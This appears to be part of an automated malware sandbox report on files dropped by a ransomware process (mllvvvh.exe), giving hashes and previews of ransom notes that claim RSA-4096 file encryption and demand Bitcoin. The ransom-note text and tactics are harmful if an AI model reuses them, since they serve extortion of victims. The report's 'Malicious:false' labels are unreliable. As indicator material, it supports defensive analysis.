                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{213668DB-2263-4E2D-ABB8-487FD539130E}v14.21.27702\packages\vcRuntimeAdditional_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
